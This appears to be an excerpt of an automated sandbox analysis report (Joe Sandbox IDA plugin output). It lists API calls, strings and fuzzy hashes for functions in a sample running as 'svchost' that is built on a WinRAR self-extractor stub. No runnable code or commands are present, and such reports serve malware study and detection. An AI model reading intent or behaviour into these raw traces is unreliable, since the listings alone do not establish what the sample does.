                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                            • String ID:
                                                            • API String ID: 42610566-0
                                                            • Opcode ID: ba01d68b38fd85ea60b4f5f59bc2ec3f07df5cffbf6fbc684e9b90a1a1f0fecc
                                                            • Instruction ID: 3806cca42476068adc119e362997a66ffe937f6a88edc97a985079325054496f
                                                            • Opcode Fuzzy Hash: ba01d68b38fd85ea60b4f5f59bc2ec3f07df5cffbf6fbc684e9b90a1a1f0fecc
                                                            • Instruction Fuzzy Hash: 53418272500519ABCB29DF68CCC8AE9B7B8FB89350F104596E59DE3200D7346E94CF91
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,00857DC4,00000000,0086C300,0000000C,00857F1B,00000000,00000002,00000000), ref: 00857E0F
                                                            • TerminateProcess.KERNEL32(00000000,?,00857DC4,00000000,0086C300,0000000C,00857F1B,00000000,00000002,00000000), ref: 00857E16
                                                            • ExitProcess.KERNEL32 ref: 00857E28
                                                            Memory Dump Source
                                                              • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                              • Associated dumps: same set as listed for the first function above (00830000, 00863000, 0086E000, 00875000, 00892000, 00893000)
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: f1fc89a05483665379ce227a53f4fe502c732c1a78ad685602d0e694475bcea2
                                                            • Instruction ID: 9552f6b6868c98e90d6b2b78b77e06fcf36390c03b1c0d9b9aa544f7c9b1ce1f
                                                            • Opcode Fuzzy Hash: f1fc89a05483665379ce227a53f4fe502c732c1a78ad685602d0e694475bcea2
                                                            • Instruction Fuzzy Hash: ABE04631000648ABCF016F24ED0AA4A3F6AFF10782F018454FC09DA132CB76DE5ACA91
                                                            Memory Dump Source
                                                              • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                              • Associated dumps: same set as listed for the first function above (00830000, 00863000, 0086E000, 00875000, 00892000, 00893000)
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: af144b45deb810d44557a57fa47be714b3ae73873a7e433bd54d899d900c7dc8
                                                            • Instruction ID: 29aa1d74bce5970c06cc780aac013cd23f4f02756e0014b3b44adb8a0edc8297
                                                            • Opcode Fuzzy Hash: af144b45deb810d44557a57fa47be714b3ae73873a7e433bd54d899d900c7dc8
                                                            • Instruction Fuzzy Hash: 0C82D570904345EEDF15DB64C895BFABBA9FF85300F0841B9F849DB242DB615A88CBE1
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0084B7E5
                                                              • Part of subcall function 00831316: GetDlgItem.USER32(00000000,00003021), ref: 0083135A
                                                              • Part of subcall function 00831316: SetWindowTextW.USER32(00000000,008635F4), ref: 00831370
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0084B8D1
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084B8EF
                                                            • IsDialogMessageW.USER32(?,?), ref: 0084B902
                                                            • TranslateMessage.USER32(?), ref: 0084B910
                                                            • DispatchMessageW.USER32(?), ref: 0084B91A
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0084B93D
                                                            • EndDialog.USER32(?,00000001), ref: 0084B960
                                                            • GetDlgItem.USER32(?,00000068), ref: 0084B983
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0084B99E
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,008635F4), ref: 0084B9B1
                                                              • Part of subcall function 0084D453: _wcslen.LIBCMT ref: 0084D47D
                                                            • SetFocus.USER32(00000000), ref: 0084B9B8
                                                            • _swprintf.LIBCMT ref: 0084BA24
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                              • Part of subcall function 0084D4D4: GetDlgItem.USER32(00000068,0088FCB8), ref: 0084D4E8
                                                              • Part of subcall function 0084D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0084AF07,00000001,?,?,0084B7B9,0086506C,0088FCB8,0088FCB8,00001000,00000000,00000000), ref: 0084D510
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0084D51B
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,000000C2,00000000,008635F4), ref: 0084D529
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0084D53F
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0084D559
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0084D59D
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0084D5AB
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0084D5BA
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0084D5E1
                                                              • Part of subcall function 0084D4D4: SendMessageW.USER32(00000000,000000C2,00000000,008643F4), ref: 0084D5F0
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0084BA68
                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0084BA90
                                                            • GetTickCount.KERNEL32 ref: 0084BAAE
                                                            • _swprintf.LIBCMT ref: 0084BAC2
                                                            • GetLastError.KERNEL32(?,00000011), ref: 0084BAF4
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0084BB43
                                                            • _swprintf.LIBCMT ref: 0084BB7C
                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0084BBD0
                                                            • GetCommandLineW.KERNEL32 ref: 0084BBEA
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0084BC47
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0084BC6F
                                                            • Sleep.KERNEL32(00000064), ref: 0084BCB9
                                                            • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0084BCE2
                                                            • CloseHandle.KERNEL32(00000000), ref: 0084BCEB
                                                            • _swprintf.LIBCMT ref: 0084BD1E
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0084BD7D
                                                            • SetDlgItemTextW.USER32(?,00000065,008635F4), ref: 0084BD94
                                                            • GetDlgItem.USER32(?,00000065), ref: 0084BD9D
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0084BDAC
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0084BDBB
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0084BE68
                                                            • _wcslen.LIBCMT ref: 0084BEBE
                                                            • _swprintf.LIBCMT ref: 0084BEE8
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 0084BF32
                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0084BF4C
                                                            • GetDlgItem.USER32(?,00000068), ref: 0084BF55
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0084BF6B
                                                            • GetDlgItem.USER32(?,00000066), ref: 0084BF85
                                                            • SetWindowTextW.USER32(00000000,0087A472), ref: 0084BFA7
                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0084C007
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0084C01A
                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0084C0BD
                                                            • EnableWindow.USER32(00000000,00000000), ref: 0084C197
                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0084C1D9
                                                              • Part of subcall function 0084C73F: __EH_prolog.LIBCMT ref: 0084C744
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0084C1FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l
                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                            • API String ID: 581453772-1670982708
                                                            • Opcode ID: b6b5e9f0394f21b04596bf3600c98169db2b14b51b31f524f2f42e759e8c3b5a
                                                            • Instruction ID: d123f63a8ab51c489d8eee7ace495df6e3a66dfab03f735ea0ecf55f6519a0a5
                                                            • Opcode Fuzzy Hash: b6b5e9f0394f21b04596bf3600c98169db2b14b51b31f524f2f42e759e8c3b5a
                                                            • Instruction Fuzzy Hash: 6B42E37094425CBAEB21ABB89C4EFBE7B6CFB11700F040055F644E61E2DBB49E44CB66

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 0084087C
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0084088E
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008408BF
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00840B69
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00840B83
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00840B93
                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,00863C7C,00000000), ref: 00840BB1
                                                            • CloseHandle.KERNEL32(00000000), ref: 00840C09
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00840C1E
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00863C7C,?,00000000,?,00000800), ref: 00840C72
                                                            • GetFileAttributesW.KERNELBASE(?,?,00863C7C,00000800,?,00000000,?,00000800), ref: 00840C9C
                                                            • GetFileAttributesW.KERNEL32(?,?,00863D44,00000800), ref: 00840CD8
                                                              • Part of subcall function 0084081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00840836
                                                              • Part of subcall function 0084081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0083F2D8,Crypt32.dll,00000000,0083F35C,?,?,0083F33E,?,?,?), ref: 00840858
                                                            • _swprintf.LIBCMT ref: 00840D4A
                                                            • _swprintf.LIBCMT ref: 00840D96
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                            • AllocConsole.KERNEL32 ref: 00840D9E
                                                            • GetCurrentProcessId.KERNEL32 ref: 00840DA8
                                                            • AttachConsole.KERNEL32(00000000), ref: 00840DAF
                                                            • _wcslen.LIBCMT ref: 00840DC4
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00840DD5
                                                            • WriteConsoleW.KERNEL32(00000000), ref: 00840DDC
                                                            • Sleep.KERNEL32(00002710), ref: 00840DE7
                                                            • FreeConsole.KERNEL32 ref: 00840DED
                                                            • ExitProcess.KERNEL32 ref: 00840DF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                            • API String ID: 1207345701-3298887752
                                                            • Opcode ID: f3cdc0d9b83ecb6c8dd268bbbadd6fbdad12df7f3bce8c6e45a704c4f21d94e2
                                                            • Instruction ID: eb56606710a133fb604fa95723b993b7438927085e0a766226d7941f596d06f5
                                                            • Opcode Fuzzy Hash: f3cdc0d9b83ecb6c8dd268bbbadd6fbdad12df7f3bce8c6e45a704c4f21d94e2
                                                            • Instruction Fuzzy Hash: 75D173B1408344ABD3219F948889B9FBAE8FB85704F52591DF385D6250DBB5864CCFA3

                                                            Control-flow Graph

                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0084C744
                                                              • Part of subcall function 0084B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0084B3FB
                                                            • _wcslen.LIBCMT ref: 0084CA0A
                                                            • _wcslen.LIBCMT ref: 0084CA13
                                                            • SetWindowTextW.USER32(?,?), ref: 0084CA71
                                                            • _wcslen.LIBCMT ref: 0084CAB3
                                                            • _wcsrchr.LIBVCRUNTIME ref: 0084CBFB
                                                            • GetDlgItem.USER32(?,00000066), ref: 0084CC36
                                                            • SetWindowTextW.USER32(00000000,?), ref: 0084CC46
                                                            • SendMessageW.USER32(00000000,00000143,00000000,0087A472), ref: 0084CC54
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0084CC7F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 2804936435-312220925
                                                            • Opcode ID: ec62451e5a2fde9c804221691af77ae707abcb784e42aaedea07cc524d978896
                                                            • Instruction ID: 08fd7663b88d90fbab746f5060657e8a25df4736214cc790d4c847b747b406a4
                                                            • Opcode Fuzzy Hash: ec62451e5a2fde9c804221691af77ae707abcb784e42aaedea07cc524d978896
                                                            • Instruction Fuzzy Hash: 55E151B290021CAADB25DBA4DC85EEE77BCFB05350F4440A6FA49E7150EB749F848F61
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0083DA70
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0083DAAC
                                                              • Part of subcall function 0083C29A: _wcslen.LIBCMT ref: 0083C2A2
                                                              • Part of subcall function 008405DA: _wcslen.LIBCMT ref: 008405E0
                                                              • Part of subcall function 00841B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0083BAE9,00000000,?,?,?,00010410), ref: 00841BA0
                                                            • _wcslen.LIBCMT ref: 0083DDE9
                                                            • __fprintf_l.LIBCMT ref: 0083DF1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                            • API String ID: 566448164-801612888
                                                            • Opcode ID: c08a6d3c848bb9fec04bee8cba55729d5e23bcbf69b3c2876d565225d0cdfaad
                                                            • Instruction ID: fcf566491364e7689eb0d4cf67b17b85a673c299d04b46eceef21684c81ce55f
                                                            • Opcode Fuzzy Hash: c08a6d3c848bb9fec04bee8cba55729d5e23bcbf69b3c2876d565225d0cdfaad
                                                            • Instruction Fuzzy Hash: 6B32CE71900318EBCF28EF68D842AEE77A5FF94304F41055AF945EB281EBB19D85CB91

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0084B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0084B579
                                                              • Part of subcall function 0084B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084B58A
                                                              • Part of subcall function 0084B568: IsDialogMessageW.USER32(00010410,?), ref: 0084B59E
                                                              • Part of subcall function 0084B568: TranslateMessage.USER32(?), ref: 0084B5AC
                                                              • Part of subcall function 0084B568: DispatchMessageW.USER32(?), ref: 0084B5B6
                                                            • GetDlgItem.USER32(00000068,0088FCB8), ref: 0084D4E8
                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,0084AF07,00000001,?,?,0084B7B9,0086506C,0088FCB8,0088FCB8,00001000,00000000,00000000), ref: 0084D510
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0084D51B
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,008635F4), ref: 0084D529
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0084D53F
                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0084D559
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0084D59D
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0084D5AB
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0084D5BA
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0084D5E1
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,008643F4), ref: 0084D5F0
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                            • String ID: \
                                                            • API String ID: 3569833718-2967466578
                                                            • Opcode ID: 8315e8469654c20d2edca2922d381acf79a3513a364e370f77a27f032585bb6b
                                                            • Instruction ID: 9863fb1c8d3646da51a653ff1d9eda04452a8d3d244f61b34e89ff6a63ea956d
                                                            • Instruction Fuzzy Hash: 5C31D171145746AFE301EF20DC4AFAB7FACFB82708F04051AF551D62A0DB658A048B7A

                                                            Control-flow Graph (image not available; executed and not-executed blocks were shown in the original figure)

                                                            APIs
                                                            • _wcslen.LIBCMT ref: 0084D7AE
                                                            • ShellExecuteExW.SHELL32(?), ref: 0084D8DE
                                                            • ShowWindow.USER32(?,00000000), ref: 0084D91D
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 0084D959
                                                            • CloseHandle.KERNEL32(?), ref: 0084D97F
                                                            • ShowWindow.USER32(?,00000001), ref: 0084D9E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                            • String ID: .exe$.inf
                                                            • API String ID: 36480843-3750412487
                                                            • Opcode ID: c51df38a33b54cb01965713b0450b06ed78f5346f4e4e5c5be408a162184b137
                                                            • Instruction ID: 859f70b0dd97da77c11f2aab80b1290feba996c1eee63aad792df1d0a45a7797
                                                            • Instruction Fuzzy Hash: 6D51E3705043889ADB319B2498447BBBFE5FF82744F08082EF9C5D7291E771CA85CB52

                                                            Control-flow Graph (image not available; executed and not-executed blocks were shown in the original figure)

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00855695,00855695,?,?,?,0085ABAC,00000001,00000001,2DE85006), ref: 0085A9B5
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0085ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0085AA3B
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0085AB35
                                                            • __freea.LIBCMT ref: 0085AB42
                                                              • Part of subcall function 00858E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0085CA2C,00000000,?,00856CBE,?,00000008,?,008591E0,?,?,?), ref: 00858E38
                                                            • __freea.LIBCMT ref: 0085AB4B
                                                            • __freea.LIBCMT ref: 0085AB70
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: 0d0989909c5e0e4ad6bdb46b1078ca26a1a4d24cb1afe6e667cec39462353364
                                                            • Instruction ID: 43ab41c4172369c1473fd7c8fd5a621e5537d0a1421ea69ea59cd011cfc117f9
                                                            • Instruction Fuzzy Hash: 4F51B372A00216ABDB298E64DCC1EABBBABFB44761B154729FC04D6140DB34DC58C693

                                                            Control-flow Graph (image not available; executed and not-executed blocks were shown in the original figure)

                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00853C35,?,?,00892088,00000000,?,00853D60,00000004,InitializeCriticalSectionEx,00866394,InitializeCriticalSectionEx,00000000), ref: 00853C03
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID: api-ms-
                                                            • API String ID: 3664257935-2084034818
                                                            • Opcode ID: bd58d8db2b0a0010d061b5de7df42a634c9f5162629963e47e0df5828622238c
                                                            • Instruction ID: d1265208f2a741301a797a3f27e8264e5a425da2b56e6371f216760f9fea4e0b
                                                            • Instruction Fuzzy Hash: CE11C632A45625ABCB228B689C41B5D37A4FF017F2F260211ED55FB290E771EF0886D2

                                                            Control-flow Graph (image not available; executed and not-executed blocks were shown in the original figure)

                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00837760,?,00000005,?,00000011), ref: 0083995F
                                                            • GetLastError.KERNEL32(?,?,00837760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0083996C
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00837760,?,00000005,?), ref: 008399A2
                                                            • GetLastError.KERNEL32(?,?,00837760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008399AA
                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00837760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008399F9
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:
                                                            • API String ID: 1999340476-0
                                                            • Opcode ID: 1b2419b2a2493f367717be878500f220a143c9961f357a8e167e6c78d9d09ac3
                                                            • Instruction ID: 7cd4912e0b457180606f9ab26ea413ecd211cf4475fca60e0fe0708cffe2c9af
                                                            • Instruction Fuzzy Hash: A531C030544745AFE7209F24CC86B9ABF98FB84320F200B19F9E1D61D1D7E4A958CBD2

                                                            Control-flow Graph (image not available; executed and not-executed blocks were shown in the original figure)

                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0084B579
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084B58A
                                                            • IsDialogMessageW.USER32(00010410,?), ref: 0084B59E
                                                            • TranslateMessage.USER32(?), ref: 0084B5AC
                                                            • DispatchMessageW.USER32(?), ref: 0084B5B6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 1266772231-0
                                                            • Opcode ID: 01ca0e6d225b2c16844107e4ed158b8522d333639a8813f5455e97603e5f9a80
                                                            • Instruction ID: cb326daedca19e8ac87aaf5331211a15af42cfc0d01a4e2677f259fb32e0182f
                                                            • Instruction Fuzzy Hash: C1F0DA71A0122ABB8B20AFE6EC4DDDBBFBCFE053917044416B919D2010EB74D605CBB0

                                                            Control-flow Graph (image not available; executed and not-executed blocks were shown in the original figure)

                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000050), ref: 0084ABC2
                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 0084ABF9
                                                              • Part of subcall function 00841FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0083C116,00000000,.exe,?,?,00000800,?,?,?,00848E3C), ref: 00841FD1
                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0084ABE9
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                            • String ID: EDIT
                                                            • API String ID: 4243998846-3080729518
                                                            • Opcode ID: 76363df5f7a04e8343832c1a65860bbbbc95a27a142905aaf23617846ca7003a
                                                            • Instruction ID: 76c7bde40cacec0ae2a23bb79c0ccf1a242ab34b4156f39f56296d1b4a91643e
                                                            • Instruction Fuzzy Hash: BDF0823274162C76DB3067649C0AF9B766CFB46B50F494012BA45E61C0DB60DE4585B6

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0084081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00840836
                                                              • Part of subcall function 0084081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0083F2D8,Crypt32.dll,00000000,0083F35C,?,?,0083F33E,?,?,?), ref: 00840858
